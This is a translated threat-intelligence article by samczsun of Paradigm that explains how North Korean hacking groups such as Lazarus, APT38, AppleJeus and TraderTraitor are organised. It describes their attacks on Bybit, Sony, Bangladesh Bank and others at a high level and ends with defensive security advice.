Paradigm: Unveiling the Threat of North Korean Hacker Group Lazarus Group

Original Title: "Demystifying the North Korean Threat"

Author: samczsun, Paradigm Research Partner

Compiled by: Bright, Foresight News

On a February morning, the SEAL 911 group’s lights lit up, and we watched in confusion as Bybit moved over $1 billion worth of tokens from their cold wallet to a brand new address, then quickly began liquidating over $200 million in LST. Within minutes, we confirmed with the Bybit team and independent analysis (multi-signature, previously using publicly verified Safe Wallet, now using newly deployed unverified contracts) that this was not routine maintenance. Someone had launched the largest hack in cryptocurrency history, and we were sitting front row at the historical drama.

While some team members (and the broader reconnaissance community) began tracking the funds and notifying cooperating exchanges, other members were trying to figure out what exactly had happened and whether other funds were at risk. Fortunately, identifying the perpetrator was easy. In recent years, only one known threat actor has successfully stolen billions from cryptocurrency exchanges: North Korea, also known as the DPRK.

However, beyond that, we had very few clues. Due to the cunning nature of North Korean hackers and their sophisticated self-concealment techniques, it is not only difficult to determine the root cause of the breach but also hard to know which specific team within North Korea is responsible. The only intelligence we could rely on indicated that North Korea indeed prefers to infiltrate cryptocurrency exchanges through social engineering. Therefore, we speculated that North Korea likely compromised Bybit's multi-signers and then deployed some malware to interfere with the signing process.

It turned out that this speculation was completely unfounded. Days later, we discovered that North Korea had actually compromised the infrastructure of the Safe Wallet itself and deployed a malicious overload specifically targeting Bybit. This level of complexity was something no one had considered or prepared for, posing a significant challenge to many security models on the market.

North Korean hackers pose an increasingly serious threat to our industry, and we cannot defeat an enemy we do not understand or comprehend. There are numerous documented incidents and articles regarding various aspects of North Korea's cyber operations, but piecing them together is challenging. I hope this overview provides a more comprehensive understanding of how North Korea operates, their strategies and procedures, making it easier for us to implement the right mitigation measures.

Organizational Structure

Perhaps the biggest misconception that needs to be addressed is how to categorize and name the vast array of North Korean cyber activities. While it is acceptable to use the term "Lazarus Group" colloquially, using more precise terminology can be helpful when discussing North Korea's systemic cyber threats in detail.

First, understanding North Korea's "organizational chart" can be beneficial. At the top is North Korea's ruling party (the only ruling party) — the Workers' Party of Korea (WPK), which oversees all government agencies in North Korea. This includes the Korean People's Army (KPA) and the Central Committee. Within the People's Army is the General Staff Department (GSD), where the Reconnaissance General Bureau (RGB) is located. The Ministry of People's Armed Forces (MID) is subordinate to the Central Committee.

The RGB is responsible for almost all of North Korea's cyber warfare, including nearly all observed North Korean activities in the cryptocurrency industry. Besides the notorious Lazarus Group, other threat actors emerging from the RGB include AppleJeus, APT38, DangerousPassword, and TraderTraitor. On the other hand, the MID is responsible for North Korea's nuclear missile program and is the primary source of North Korean IT workers, referred to by the intelligence community as Contagious Interview and Wagemole.

Lazarus Group

The Lazarus Group is a highly sophisticated hacking organization, with cybersecurity experts believing that some of the largest and most destructive cyberattacks in history have been attributed to this group. In 2016, Novetta first identified the Lazarus Group while analyzing the Sony Pictures Entertainment hack.

In 2014, Sony was producing the action-comedy film "The Interview," which prominently featured the humiliation and subsequent assassination of Kim Jong-un. Understandably, this was not well-received by the North Korean regime, which retaliated by hacking Sony's network, stealing several terabytes of data, leaking hundreds of gigabytes of confidential or sensitive information, and deleting originals. As then-CEO Michael Lynton stated, "The people who do this not only steal everything in the house, they burn the house down." Ultimately, Sony's investigation and remediation costs from this attack amounted to at least $15 million, with losses potentially higher.

Subsequently, in 2016, a hack remarkably similar to Lazarus Group's operations targeted the Bangladesh Bank, aiming to steal nearly $1 billion. Over the course of a year, the hackers worked to socially engineer Bangladesh Bank employees, ultimately gaining remote access and moving within the bank's internal network until they reached the computers responsible for interacting with the SWIFT network. From that point, they waited for the perfect opportunity to attack: Bangladesh Bank was closed for the weekend on Thursdays, while the New York Federal Reserve Bank was closed for the weekend on Fridays. On Thursday evening local time, the threat actors used their access to the SWIFT network to send 36 separate transfer requests to the New York Federal Reserve Bank, which were forwarded to the Rizal Commercial Banking Corporation (RCBC) in the Philippines within the next 24 hours. When Bangladesh Bank reopened, they discovered the hack and attempted to notify RCBC to stop the ongoing transactions, only to find that RCBC was closed for the Lunar New Year holiday.

Finally, in 2017, the massive WannaCry 2.0 ransomware attack crippled industries worldwide, with part of the blame attributed to the Lazarus Group. It is estimated that WannaCry caused billions in damages, exploiting a Microsoft Windows 0day initially developed by the NSA, encrypting local devices and spreading to other accessible devices, ultimately infecting hundreds of thousands of devices globally. Fortunately, due to security researcher Marcus Hutchins discovering and activating a kill switch within eight hours, the final losses were contained.

Throughout the development of the Lazarus Group, they have demonstrated high technical capabilities and execution, with one of their goals being to generate revenue for the North Korean regime. Therefore, it was only a matter of time before they turned their attention to the cryptocurrency industry.

Derivatives

Over time, as the Lazarus Group became the favored term used by the media to describe North Korean cyber activities, the cybersecurity industry created more precise names for the specific activities of Lazarus Group and North Korea. APT38 is one such example, which separated from the Lazarus Group around 2016 to focus on financial crimes, initially targeting banks (like Bangladesh Bank) and then cryptocurrency. Later, in 2018, a new threat named AppleJeus was discovered spreading malware targeting cryptocurrency users. Furthermore, as early as 2018, when OFAC first announced sanctions against two shell companies used by North Koreans, North Korean individuals posing as IT workers had already infiltrated the tech industry.

North Korean IT Workers

Although the earliest records mentioning North Korean IT workers date back to the 2018 OFAC sanctions, Unit 42's 2023 report provided more detailed information and identified two distinct threat actors: Contagious Interview and Wagemole.

Reportedly, Contagious Interview impersonates recruiters from well-known companies to lure developers into fake interview processes. Subsequently, potential candidates are instructed to clone a repository for local debugging, ostensibly as a coding challenge, but in reality, the repository contains a backdoor that, when executed, hands control of the affected machine over to the attacker. This activity has been ongoing, with the most recent record on August 11, 2024.

On the other hand, Wagemole agents primarily aim not to hire potential victims but to be hired by companies, where they work as ordinary engineers, albeit with potentially low efficiency. That said, there are records of IT workers utilizing their access for attacks, such as in the Munchables incident, where an employee linked to North Korean activities exploited their privileged access to smart contracts to steal all assets.

The complexity of Wagemole agents varies, ranging from generic resume templates and reluctance to participate in video calls to highly customized resumes, deepfake video interviews, and identification documents like driver's licenses and utility bills. In some cases, agents have infiltrated victim organizations for up to a year before using their access to breach other systems and/or fully cash out.

AppleJeus

AppleJeus primarily focuses on spreading malware and excels at conducting complex supply chain attacks. In 2023, the 3CX supply chain attack allowed attackers to potentially infect over 12 million users of 3CX VoIP software, but it was later discovered that 3CX itself had also been affected by a supply chain attack from one of its upstream suppliers, Trading Technologies.

In the cryptocurrency industry, AppleJeus initially spread malware packaged as legitimate software (such as trading software or cryptocurrency wallets). However, over time, their strategy evolved. In October 2024, Radiant Capital was compromised by malware sent via Telegram from a threat actor impersonating a trusted contractor, which Mandiant attributed to AppleJeus.

Dangerous Password

Dangerous Password is responsible for low-complexity, socially engineered attacks on the cryptocurrency industry. As early as 2019, JPCERT/CC recorded that Dangerous Password would send phishing emails with enticing attachments for users to download. In previous years, Dangerous Password was responsible for sending phishing emails impersonating industry figures, with subjects like "Stablecoins and Crypto Assets Are Highly Risky."

Today, Dangerous Password continues to send phishing emails but has also expanded to other platforms. For example, Radiant Capital reported receiving a phishing message via Telegram from someone impersonating a security researcher, distributing a file named "PenpieHackingAnalysis_Report.zip." Additionally, users reported that someone impersonating journalists and investors contacted them, requesting to arrange calls using an inconspicuous video conferencing application. Like Zoom, these applications download a one-time installer, but during execution, they install malware on the device.

TraderTraitor

TraderTraitor is the most sophisticated North Korean hacker targeting the cryptocurrency industry and has launched attacks on Axie Infinity and Rain.com, among others. TraderTraitor almost exclusively targets exchanges and other companies with large reserves, and does not deploy zero-day vulnerabilities against its targets but instead uses highly sophisticated spear-phishing techniques to attack victims. In the Axie Infinity hack case, TraderTraitor contacted a senior engineer via LinkedIn and successfully persuaded them to undergo a series of interviews, then sent a "proposal" that delivered malware. Then, in the WazirX hack, TraderTraitor agents compromised an undetermined component in the signing pipeline and drained the exchange's hot wallet through repeated deposits and withdrawals, leading WazirX engineers to rebalance from cold wallets to hot wallets. When WazirX engineers attempted to sign transactions to transfer funds, they were tricked into signing a transaction that transferred control of the cold wallet to TraderTraitor. This is very similar to the February 2025 attack on Bybit, where TraderTraitor first compromised the Safe{Wallet} infrastructure through social engineering, then deployed malicious JavaScript targeting Bybit's cold wallet front end. When Bybit went to rebalance their wallets, the malicious code was activated, causing Bybit engineers to sign a transaction that transferred control of the cold wallet to TraderTraitor.

Stay Safe

North Korea has demonstrated the ability to deploy zero-day vulnerabilities against opponents, but there are currently no records or known incidents of North Korea deploying zero-day vulnerabilities against the cryptocurrency industry. Therefore, typical security advice applies to almost all North Korean hacker threats.

For individuals, it is essential to use common sense and be wary of social engineering tactics. For instance, if someone claims to have some highly confidential information and is willing to share it with you, proceed with caution. Or, if someone pressures you for time, asking you to download and run certain software, consider whether they are trying to put you in a position where you cannot think logically.

For organizations, apply the principle of least privilege as much as possible. Minimize the number of people with access to sensitive systems and ensure they use password managers and 2FA. Keep personal devices and work devices separate, and install Mobile Device Management (MDM) and Endpoint Detection and Response (EDR) software on work devices to ensure security before a hacker intrusion and visibility after an intrusion.

Unfortunately, for large exchanges or other high-value targets, TraderTraitor can cause unexpected damage even without zero-day vulnerabilities. Therefore, additional precautions must be taken to ensure there are no single points of failure to prevent a single breach from resulting in total loss of funds.

However, even if everything fails, there is still hope. The FBI has a dedicated department tracking and preventing North Korean intrusions and has been notifying victims for years. Recently, I was pleased to assist the department's agents in connecting with potential North Korean targets. Therefore, to be prepared for the worst, ensure you have publicly available contact information or that you are connected with enough people in the ecosystem (such as SEAL 911) so that messages traversing the social graph can reach you as quickly as possible.